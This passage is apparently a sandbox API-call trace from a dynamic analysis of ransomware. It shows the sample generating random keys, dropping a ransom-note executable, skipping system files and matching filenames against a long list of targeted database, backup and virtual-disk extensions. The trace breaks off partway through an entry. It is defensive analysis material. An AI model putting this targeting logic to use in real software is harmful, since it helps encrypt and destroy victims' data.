[0074.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0074.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0074.250] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0074.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0074.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.251] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25300, lpName=0x0) returned 0x120 [0074.253] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25300) returned 0x420000 [0074.273] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0074.274] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0074.274] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0074.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0074.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0074.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0074.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0074.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0074.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0074.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0074.275] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0074.276] CloseHandle (hObject=0x120) returned 1 [0074.276] CloseHandle (hObject=0x118) returned 1 [0074.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0074.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0074.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0074.277] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1afc00, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x5a1afc00, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x5a1afc00, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0074.277] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0074.277] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2608 [0074.277] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0074.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0074.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0074.277] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 71 [0074.277] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0074.278] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.278] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.278] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0074.278] GetLastError () returned 0x0 [0074.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0074.278] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0074.279] CloseHandle (hObject=0x15c) returned 1 [0074.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0074.279] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.279] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0074.279] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.279] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.279] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0074.279] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.279] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.279] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0074.279] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0074.279] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0074.279] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c14cd00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.279] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.279] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfe3882c0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="aoldtz.exe") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="bootmgr") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="temp") returned -1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="pagefile.sys") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="boot") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="ids.txt") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="perflogs") returned 1 [0074.279] lstrcmpiW (lpString1="state.rsm", lpString2="MSBuild") returned 1 [0074.279] lstrlenW (lpString="state.rsm") returned 9 [0074.280] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*") returned 73 [0074.280] lstrcpyW (in: lpString1=0x2cce490, lpString2="state.rsm" | out: lpString1="state.rsm") returned="state.rsm" [0074.280] lstrlenW (lpString="state.rsm") returned 9 [0074.280] lstrlenW (lpString="Ares865") returned 7 [0074.280] lstrcmpiW (lpString1="ate.rsm", lpString2="Ares865") returned 1 [0074.280] lstrlenW (lpString=".dll") returned 4 [0074.280] lstrcmpiW (lpString1="state.rsm", lpString2=".dll") returned 1 [0074.280] lstrlenW (lpString=".lnk") returned 4 [0074.280] lstrcmpiW (lpString1="state.rsm", lpString2=".lnk") returned 1 [0074.280] lstrlenW (lpString=".ini") returned 4 [0074.280] lstrcmpiW (lpString1="state.rsm", lpString2=".ini") returned 1 [0074.280] lstrlenW (lpString=".sys") returned 4 [0074.280] lstrcmpiW (lpString1="state.rsm", lpString2=".sys") returned 1 [0074.280] lstrlenW (lpString="state.rsm") returned 9 [0074.280] lstrlenW (lpString="bak") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="bak") returned 1 [0074.280] lstrlenW (lpString="ba_") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="ba_") returned 1 [0074.280] lstrlenW (lpString="dbb") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="dbb") returned 1 [0074.280] lstrlenW (lpString="vmdk") returned 4 [0074.280] lstrcmpiW (lpString1=".rsm", lpString2="vmdk") returned -1 [0074.280] lstrlenW (lpString="rar") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="rar") returned 1 [0074.280] lstrlenW (lpString="zip") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="zip") returned -1 [0074.280] lstrlenW (lpString="tgz") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="tgz") returned -1 [0074.280] lstrlenW (lpString="vbox") returned 4 [0074.280] lstrcmpiW (lpString1=".rsm", lpString2="vbox") returned -1 [0074.280] lstrlenW (lpString="vdi") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="vdi") returned -1 [0074.280] lstrlenW (lpString="vhd") returned 3 [0074.280] lstrcmpiW (lpString1="rsm", lpString2="vhd") returned -1 [0074.280] lstrlenW (lpString="vhdx") returned 4 [0074.280] lstrcmpiW (lpString1=".rsm", lpString2="vhdx") returned -1 [0074.280] lstrlenW (lpString="avhd") returned 4 [0074.280] lstrcmpiW (lpString1=".rsm", lpString2="avhd") returned -1 [0074.281] lstrlenW (lpString="db") returned 2 [0074.281] lstrcmpiW (lpString1="sm", lpString2="db") returned 1 [0074.281] lstrlenW (lpString="db2") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="db2") returned 1 [0074.281] lstrlenW (lpString="db3") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="db3") returned 1 [0074.281] lstrlenW (lpString="dbf") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="dbf") returned 1 [0074.281] lstrlenW (lpString="mdf") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="mdf") returned 1 [0074.281] lstrlenW (lpString="mdb") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="mdb") returned 1 [0074.281] lstrlenW (lpString="sql") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="sql") returned -1 [0074.281] lstrlenW (lpString="sqlite") returned 6 [0074.281] lstrcmpiW (lpString1="te.rsm", lpString2="sqlite") returned 1 [0074.281] lstrlenW (lpString="sqlite3") returned 7 [0074.281] lstrcmpiW (lpString1="ate.rsm", lpString2="sqlite3") returned -1 [0074.281] lstrlenW (lpString="sqlitedb") returned 8 [0074.281] lstrcmpiW (lpString1="tate.rsm", lpString2="sqlitedb") returned 1 [0074.281] lstrlenW (lpString="xml") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="xml") returned -1 [0074.281] lstrlenW (lpString="$er") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="$er") returned 1 [0074.281] lstrlenW (lpString="4dd") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="4dd") returned 1 [0074.281] lstrlenW (lpString="4dl") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="4dl") returned 1 [0074.281] lstrlenW (lpString="^^^") returned 3 [0074.281] lstrcmpiW (lpString1="rsm", lpString2="^^^") returned 1 [0074.281] lstrlenW (lpString="abs") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="abs") returned 1 [0074.282] lstrlenW (lpString="abx") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="abx") returned 1 [0074.282] lstrlenW (lpString="accdb") returned 5 [0074.282] lstrcmpiW (lpString1="e.rsm", lpString2="accdb") returned 1 [0074.282] lstrlenW (lpString="accdc") returned 5 [0074.282] lstrcmpiW (lpString1="e.rsm", lpString2="accdc") returned 1 [0074.282] lstrlenW (lpString="accde") returned 5 [0074.282] lstrcmpiW (lpString1="e.rsm", lpString2="accde") returned 1 [0074.282] lstrlenW (lpString="accdr") returned 5 [0074.282] lstrcmpiW (lpString1="e.rsm", lpString2="accdr") returned 1 [0074.282] lstrlenW (lpString="accdt") returned 5 [0074.282] lstrcmpiW (lpString1="e.rsm", lpString2="accdt") returned 1 [0074.282] lstrlenW (lpString="accdw") returned 5 [0074.282] lstrcmpiW (lpString1="e.rsm", lpString2="accdw") returned 1 [0074.282] lstrlenW (lpString="accft") returned 5 [0074.282] lstrcmpiW (lpString1="e.rsm", lpString2="accft") returned 1 [0074.282] lstrlenW (lpString="adb") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0074.282] lstrlenW (lpString="adb") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0074.282] lstrlenW (lpString="ade") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="ade") returned 1 [0074.282] lstrlenW (lpString="adf") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="adf") returned 1 [0074.282] lstrlenW (lpString="adn") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="adn") returned 1 [0074.282] lstrlenW (lpString="adp") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="adp") returned 1 [0074.282] lstrlenW (lpString="alf") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="alf") returned 1 [0074.282] lstrlenW (lpString="ask") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="ask") returned 1 [0074.282] lstrlenW (lpString="btr") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="btr") returned 1 [0074.282] lstrlenW (lpString="cat") returned 3 [0074.282] lstrcmpiW (lpString1="rsm", lpString2="cat") returned 1 [0074.283] lstrlenW (lpString="cdb") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="cdb") returned 1 [0074.283] lstrlenW (lpString="ckp") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="ckp") returned 1 [0074.283] lstrlenW (lpString="cma") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="cma") returned 1 [0074.283] lstrlenW (lpString="cpd") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="cpd") returned 1 [0074.283] lstrlenW (lpString="dacpac") returned 6 [0074.283] lstrcmpiW (lpString1="te.rsm", lpString2="dacpac") returned 1 [0074.283] lstrlenW (lpString="dad") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dad") returned 1 [0074.283] lstrlenW (lpString="dadiagrams") returned 10 [0074.283] lstrlenW (lpString="daschema") returned 8 [0074.283] lstrcmpiW (lpString1="tate.rsm", lpString2="daschema") returned 1 [0074.283] lstrlenW (lpString="db-journal") returned 10 [0074.283] lstrlenW (lpString="db-shm") returned 6 [0074.283] lstrcmpiW (lpString1="te.rsm", lpString2="db-shm") returned 1 [0074.283] lstrlenW (lpString="db-wal") returned 6 [0074.283] lstrcmpiW (lpString1="te.rsm", lpString2="db-wal") returned 1 [0074.283] lstrlenW (lpString="dbc") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dbc") returned 1 [0074.283] lstrlenW (lpString="dbs") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dbs") returned 1 [0074.283] lstrlenW (lpString="dbt") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dbt") returned 1 [0074.283] lstrlenW (lpString="dbv") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dbv") returned 1 [0074.283] lstrlenW (lpString="dbx") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dbx") returned 1 [0074.283] lstrlenW (lpString="dcb") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dcb") returned 1 [0074.283] lstrlenW (lpString="dct") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dct") returned 1 [0074.283] lstrlenW (lpString="dcx") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="dcx") returned 1 [0074.283] lstrlenW (lpString="ddl") returned 3 [0074.283] lstrcmpiW (lpString1="rsm", lpString2="ddl") returned 1 [0074.284] lstrlenW (lpString="dlis") returned 4 [0074.284] lstrcmpiW (lpString1=".rsm", lpString2="dlis") returned -1 [0074.284] lstrlenW (lpString="dp1") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="dp1") returned 1 [0074.284] lstrlenW (lpString="dqy") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="dqy") returned 1 [0074.284] lstrlenW (lpString="dsk") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="dsk") returned 1 [0074.284] lstrlenW (lpString="dsn") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="dsn") returned 1 [0074.284] lstrlenW (lpString="dtsx") returned 4 [0074.284] lstrcmpiW (lpString1=".rsm", lpString2="dtsx") returned -1 [0074.284] lstrlenW (lpString="dxl") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="dxl") returned 1 [0074.284] lstrlenW (lpString="eco") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="eco") returned 1 [0074.284] lstrlenW (lpString="ecx") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="ecx") returned 1 [0074.284] lstrlenW (lpString="edb") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="edb") returned 1 [0074.284] lstrlenW (lpString="epim") returned 4 [0074.284] lstrcmpiW (lpString1=".rsm", lpString2="epim") returned -1 [0074.284] lstrlenW (lpString="fcd") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="fcd") returned 1 [0074.284] lstrlenW (lpString="fdb") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="fdb") returned 1 [0074.284] lstrlenW (lpString="fic") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="fic") returned 1 [0074.284] lstrlenW (lpString="flexolibrary") returned 12 [0074.284] lstrlenW (lpString="fm5") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="fm5") returned 1 [0074.284] lstrlenW (lpString="fmp") returned 3 [0074.284] lstrcmpiW (lpString1="rsm", lpString2="fmp") returned 1 [0074.284] lstrlenW (lpString="fmp12") returned 5 [0074.284] lstrcmpiW (lpString1="e.rsm", lpString2="fmp12") returned -1 [0074.284] lstrlenW (lpString="fmpsl") returned 5 [0074.284] lstrcmpiW (lpString1="e.rsm", lpString2="fmpsl") returned -1 [0074.285] lstrlenW (lpString="fol") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="fol") returned 1 [0074.285] lstrlenW (lpString="fp3") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="fp3") returned 1 [0074.285] lstrlenW (lpString="fp4") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="fp4") returned 1 [0074.285] lstrlenW (lpString="fp5") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="fp5") returned 1 [0074.285] lstrlenW (lpString="fp7") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="fp7") returned 1 [0074.285] lstrlenW (lpString="fpt") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="fpt") returned 1 [0074.285] lstrlenW (lpString="frm") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="frm") returned 1 [0074.285] lstrlenW (lpString="gdb") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0074.285] lstrlenW (lpString="gdb") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0074.285] lstrlenW (lpString="grdb") returned 4 [0074.285] lstrcmpiW (lpString1=".rsm", lpString2="grdb") returned -1 [0074.285] lstrlenW (lpString="gwi") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="gwi") returned 1 [0074.285] lstrlenW (lpString="hdb") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="hdb") returned 1 [0074.285] lstrlenW (lpString="his") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="his") returned 1 [0074.285] lstrlenW (lpString="ib") returned 2 [0074.285] lstrcmpiW (lpString1="sm", lpString2="ib") returned 1 [0074.285] lstrlenW (lpString="idb") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="idb") returned 1 [0074.285] lstrlenW (lpString="ihx") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="ihx") returned 1 [0074.285] lstrlenW (lpString="itdb") returned 4 [0074.285] lstrcmpiW (lpString1=".rsm", lpString2="itdb") returned -1 [0074.285] lstrlenW (lpString="itw") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="itw") returned 1 [0074.285] lstrlenW (lpString="jet") returned 3 [0074.285] lstrcmpiW (lpString1="rsm", lpString2="jet") returned 1 [0074.286] lstrlenW (lpString="jtx") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="jtx") returned 1 [0074.286] lstrlenW (lpString="kdb") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="kdb") returned 1 [0074.286] lstrlenW (lpString="kexi") returned 4 [0074.286] lstrcmpiW (lpString1=".rsm", lpString2="kexi") returned -1 [0074.286] lstrlenW (lpString="kexic") returned 5 [0074.286] lstrcmpiW (lpString1="e.rsm", lpString2="kexic") returned -1 [0074.286] lstrlenW (lpString="kexis") returned 5 [0074.286] lstrcmpiW (lpString1="e.rsm", lpString2="kexis") returned -1 [0074.286] lstrlenW (lpString="lgc") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="lgc") returned 1 [0074.286] lstrlenW (lpString="lwx") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="lwx") returned 1 [0074.286] lstrlenW (lpString="maf") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="maf") returned 1 [0074.286] lstrlenW (lpString="maq") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="maq") returned 1 [0074.286] lstrlenW (lpString="mar") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="mar") returned 1 [0074.286] lstrlenW (lpString="marshal") returned 7 [0074.286] lstrcmpiW (lpString1="ate.rsm", lpString2="marshal") returned -1 [0074.286] lstrlenW (lpString="mas") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="mas") returned 1 [0074.286] lstrlenW (lpString="mav") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="mav") returned 1 [0074.286] lstrlenW (lpString="maw") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="maw") returned 1 [0074.286] lstrlenW (lpString="mdbhtml") returned 7 [0074.286] lstrcmpiW (lpString1="ate.rsm", lpString2="mdbhtml") returned -1 [0074.286] lstrlenW (lpString="mdn") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="mdn") returned 1 [0074.286] lstrlenW (lpString="mdt") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="mdt") returned 1 [0074.286] lstrlenW (lpString="mfd") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="mfd") returned 1 [0074.286] lstrlenW (lpString="mpd") returned 3 [0074.286] lstrcmpiW (lpString1="rsm", lpString2="mpd") returned 1 [0074.287] lstrlenW (lpString="mrg") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="mrg") returned 1 [0074.287] lstrlenW (lpString="mud") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="mud") returned 1 [0074.287] lstrlenW (lpString="mwb") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="mwb") returned 1 [0074.287] lstrlenW (lpString="myd") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="myd") returned 1 [0074.287] lstrlenW (lpString="ndf") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="ndf") returned 1 [0074.287] lstrlenW (lpString="nnt") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="nnt") returned 1 [0074.287] lstrlenW (lpString="nrmlib") returned 6 [0074.287] lstrcmpiW (lpString1="te.rsm", lpString2="nrmlib") returned 1 [0074.287] lstrlenW (lpString="ns2") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="ns2") returned 1 [0074.287] lstrlenW (lpString="ns3") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="ns3") returned 1 [0074.287] lstrlenW (lpString="ns4") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="ns4") returned 1 [0074.287] lstrlenW (lpString="nsf") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="nsf") returned 1 [0074.287] lstrlenW (lpString="nv") returned 2 [0074.287] lstrcmpiW (lpString1="sm", lpString2="nv") returned 1 [0074.287] lstrlenW (lpString="nv2") returned 3 [0074.287] 